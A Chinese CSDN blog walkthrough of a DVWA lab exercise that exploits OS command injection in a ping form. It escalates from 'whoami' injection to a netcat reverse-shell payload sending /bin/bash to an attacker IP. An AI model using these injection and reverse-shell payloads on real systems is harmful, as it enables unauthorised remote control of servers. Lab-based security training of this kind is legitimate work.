检测和利用命令注入漏洞(获取到反向shell)

该文描述了一次针对DVWA(DamnVulnerableWebApplication)的命令注入测试过程。在安全等级为Low的情况下,通过不同命令连接符号注入,如`&`和`|`,测试并利用漏洞。最终,通过在KaliLinux上监听端口并利用nc工具,成功获取了OWASP靶机的反向shell。
摘要由CSDN通过智能技术生成

目录

环境准备

开启kali和owasp靶机

登录到 DVWA 中,并进入命令执行页面(Command Execution),安全等级为Low

命令连接符号说明

检测和利用命令注入漏洞案例

        在输入框输入: 192.168.xx.xx(kali主机IP)

        进行测试:

让尝试注入一个非常简单的命令。提交以下代码,

192.168.137.128&whoami

如果去掉 IP 地址,仅有whoami呢?结果如下图所示:

尝试127.0.0.1 | whoami

        现在,试着获得一个反向 shell,首先,必须确保owasp靶机上拥有需要的东西,即合适的nc工具,输入: 127.0.0.1 | ls /bin/nc*

下一步是监听 Kali Linux 中的连接。打开kali终端,运行以下命令: nc -lp 1691 -v

然后在浏览器中提交以下内容:

将看到如何在监听 Kali 终端接收连接。在这里,可以在服务器上执行命令,如下图所示:


环境准备

开启kali和owasp靶机
登录到 DVWA 中,并进入命令执行页面(Command Execution),安全等级为Low

   

命令连接符号说明

        &&:代表首先执行命令a,若成功再执行命令b,又被称为短路运算符。

        &:代表首先执行命令a再执行命令b,不管a是否成功,都会执行命令b。在执行效率上来说“&&”更加高效。

        ||:代表首先执行a命令再执行b命令,只有a命令执行不成功,才会执行b命令。

        |:代表首先执行a命令,在执行b命令,不管a命令成功与否,都会去执行b命令。(当命令a失败时,它仍然会执行命令b,表示A命令语句的输出,作为B命令语句的输入执行。)

检测和利用命令注入漏洞案例

        在输入框输入: 192.168.xx.xx(kali主机IP)
        进行测试:

        这个输出看起来像是直接从 ping 命令的输出中获得的。(这表明服务器正在使用操作系统命令来执行 ping,因此可能会注入操作系统命令。)

让尝试注入一个非常简单的命令。提交以下代码,
192.168.137.128&whoami

可以看到通过whoami获取到了当前用户

(使用命令连接符号注入额外的命令)

如果去掉 IP 地址,仅有whoami呢?结果如下图所示:

发现未得到任何结果

(测试除了IP,输入其他命令的效果)

尝试127.0.0.1 | whoami

        现在,试着获得一个反向 shell,首先,必须确保owasp靶机上拥有需要的东西,即合适的nc工具,输入: 127.0.0.1 | ls /bin/nc*

(确定靶机上有NC工具,为获取反向shell做准备)

        返回一个完整路径的文件列表,有不止一个版本的 NetCat,它是用来生成连接的工具。NetCat 的 OpenBSD 版本不支持在连接上执行命令,因此将使用 traditional 。

下一步是监听 Kali Linux 中的连接。打开kali终端,运行以下命令: nc -lp 1691 -v

(在kali中打开接口,等待靶机连接)

然后在浏览器中提交以下内容:

127.0.0.1 | nc.traditional -e/bin/bash 192.168.11.130 1691 &

(利用命令连接符号,使用nc工具连到kali)

将看到如何在监听 Kali 终端接收连接。在这里,可以在服务器上执行命令,如下图所示:

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值